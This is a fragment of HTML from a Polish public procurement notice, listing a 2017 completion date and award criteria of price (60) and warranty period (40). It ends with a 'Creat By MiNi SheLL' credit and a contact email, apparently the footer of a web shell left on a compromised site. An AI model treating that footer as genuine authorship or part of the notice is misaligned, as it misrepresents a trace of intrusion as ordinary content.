                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa ryczałtowa</td><td>60</td></tr><tr><td>okres gwarancji i rękojmi za wady i usterki</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com